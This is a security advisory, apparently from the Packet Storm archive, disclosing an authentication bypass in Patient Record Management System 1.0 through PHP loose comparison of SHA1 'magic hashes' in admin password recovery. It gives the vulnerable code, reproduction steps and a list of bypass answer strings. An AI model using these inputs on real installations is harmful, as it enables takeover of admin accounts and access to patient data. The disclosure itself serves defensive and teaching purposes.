what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Patient Record Management System 1.0 Authentication Bypass

Patient Record Management System 1.0 Authentication Bypass
Posted Jan 20, 2023
Authored by Joe Pollock

Patient Record Management System version 1.0 suffers from an authentication bypass vulnerability during account recovery.

tags | exploit, bypass
SHA-256 | fcbfb754db1b7a2c678e6eb2a40d7a65fc9eaf4b77ffc390b629b6009685d209

Patient Record Management System 1.0 Authentication Bypass

Change Mirror Download
# Exploit Title: Patient Record Management System v1.0 - Authentication Bypass via PHP Loose Comparison
# Exploit Author: Joe Pollock
# Date: January 19, 2023
# Vendor Homepage: https://www.sourcecodester.com/php/13505/patient-record-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/patientrecords.zip
# Tested on: Kali Linux, Apache, Mysql, PHP 8.1.5
# CVE: T.B.C
# Vendor: kimcey500
# Version: 1.0
# Exploit Description:
# Patient Record Management System v1.0 implements a PHP loose comparison within the password recovery functionality (secret question/answer) of
# the admin account, which renders the application vulnerable to an authentication bypass depending on the secret answer chosen by the administrator.
# If the secret answer generates a SHA1 magic hash (SHA1 is the hashing format used by the application to store secret answers) then an authentication
# bypass of the admin account is possible using any other SHA1 magic hash. The vulnerable function is found within User_model.php and is shown below:

public function get_forgot_secret($login_id, $secans){
$this->db->where('u_id', $login_id);
$query = $this->db->get('users');
$decrypt = $query->row()->u_secretanswer;
if(sha1($secans) == $decrypt){ // md5 encryption
return $query->row();
}
}

========================================================
(+) To reproduce this exploit:
========================================================
1. Log in as the administrator and navigate to the password recovery functionality (http://localhost/Indexcontrol/secretquestion).
2. Enter the ‘Current Password’ then select any ‘Secret Question’.
3. For the ‘Secret Answer’, use the following: 10932435112
4. Confirm the ‘Secret Answer’ then click ‘Submit’. Now logout of the administrator account.
5. From the admin login page, click ‘Forgot Password?’.
6. Enter ‘admin’ as the username then click ‘Submit’.
7. For the ‘Secret Answer’, use any of the following:

aaroZmOk
w9KASOk6Ikap
aaO8zKZF
aa3OFF9m
w9KASOk6Ikap

8. After clicking 'Submit, the 'create new password' functionality should be displayed and therefore authentication can be bypassed.

========================================================
(+) Explanation:
========================================================
Following from above, assume the administrator has chosen the following as their secret answer:

10932435112

The application then stores the SHA1 hash of the secret answer in the database. The stored hash is:

0e07766915004133176347055865026311692244

The above hash is an example of a 'magic hash', i.e. the hash starts with "0e" (or "0..0e") only followed by numbers.

In PHP, if two strings are loosely compared (==) and match the regular expression 0+e[0-9]+, the result will be TRUE.

It will then be possible to bypass the authentication of this account using any secret answer which generates a SHA1 magic hash.

Any of the following secret answers could be used to bypass authentication:

aaroZmOk
w9KASOk6Ikap
aaO8zKZF
aa3OFF9m
w9KASOk6Ikap

See here for more examples that could be used: https://github.com/spaze/hashes/blob/master/sha1.md

The comparision which would take place by the application in get_forgot_secret() is:

if(sha1(aaroZmOk) == "0e07766915004133176347055865026311692244"){
//Reset password

Which becomes:

if("0e66507019969427134894567494305185566735" == "0e07766915004133176347055865026311692244"){
//Reset password

Due to the loose comparision used (==), the above evaluates to TRUE, which would then allow the attacker to change
the password of the account.

You can try this yourself using the interactive PHP interpreter:

var_dump(sha1('aaroZmOk') == "0e111");
var_dump(sha1('aaroZmOk') == "0e222");
var_dump(sha1('aaroZmOk') == sha1('w9KASOk6Ikap'));

========================================================
(+) References and more information
========================================================
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Type%20Juggling/README.md
http://turbochaos.blogspot.com/2013/08/exploiting-exotic-bugs-php-type-juggling.html
https://www.whitehatsec.com/blog/magic-hashes/
https://github.com/spaze/hashes
https://offsec.almond.consulting/super-magic-hash.html































Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close